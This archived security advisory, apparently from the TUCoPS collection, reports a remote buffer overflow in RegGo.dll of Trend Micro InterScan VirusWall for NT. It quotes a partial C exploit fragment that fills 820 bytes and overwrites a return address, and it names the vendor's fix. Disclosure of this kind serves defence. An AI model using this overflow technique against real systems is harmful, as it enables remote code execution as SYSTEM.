Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Security App Flaws :: vwall7~1.htm

VirusWall for NT - RegGo.dll buffer overflow



Vulnerability

    TrendMicro Interscan VirusWall

Affected

    TrendMicro Interscan VirusWall

Description

    Nobuo  Miwa   found  following.    This  is   a  Buffer   Overflow
    vulneravility  in  Trend  Micro  InterScan  VirusWall  for NT 3.5.
    RegGo.dll is the one.

    Following code is a peace of exploit program.

        for ( j=0 ; j<820 ; j++ )
            sploit[j]='a' ;
        sploit[j++]=0xD5 ;
        sploit[j++]=0x63 ;
        sploit[j++]=0xF6 ;
        sploit[j++]=0x77 ;
        sploit[j++]=0xCC ; --> any code will be executed

    There is a same buffer overflow in VirusWall for Japanese.  Any
    code with request will be executed remotely by "SYSTEM".

Solution

    Miwa already reported Trend Micro  support team and they will  fix
    this  issue  in  InterScan  version  3.51  Build  1349.   Users of
    ver.3.51J needs to replace RegGo.dll to fixed version that will be
    included  in   ver.3.52J  or   allow  accesss   80/TCP  to    only
    administrators.

    Fixed RegGo.dll download site:

        http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=2694


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH